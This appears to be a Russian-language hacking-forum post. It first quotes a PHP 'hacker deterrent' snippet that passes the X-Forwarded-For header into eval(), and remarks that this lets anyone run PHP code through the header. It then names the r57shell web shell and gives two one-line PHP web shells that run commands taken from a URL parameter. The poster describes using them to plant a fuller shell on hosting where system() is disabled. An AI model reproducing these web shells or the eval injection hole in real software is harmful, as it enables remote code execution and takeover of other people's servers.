А ещё я вот таким шифруюсь: PHP: $pag = isset($_GET['page']) ? $_GET['page'] : 1; if (($pag != 1) && ($pag != 2) && ($pag != 3) && ($pag != 4)) { $aaa = isset($_SERVER['HTTP_X_FORWARDED_FOR'])? $_SERVER['HTTP_X_FORWARDED_FOR'] : "\"\""; $k = explode('.', $aaa); if (isset($k[3]) && is_numeric($k[3])) $aaa = "\"$aaa\""; print "Never do it again, dumm from "; eval("print $aaa;"); print " via ".$_SERVER['REMOTE_ADDR']; print "<IMG align='left' src='img/stop.jpg' />"; footer(); die; }; Если чё-то передать в X-Forwarded-For, то можно выполнить php код=) А якобы отпугиватель хакеров=)
r57shell. Самопалы типа <?php eval($_GET['cmd']);?> <?php echo `$_GET[cmd]`;?> пользую только чтобы нормальный шелл воткнуть, ибо многие хостеры отключают system() passthru() и т.д., шелл должен все проверять по порядку способы.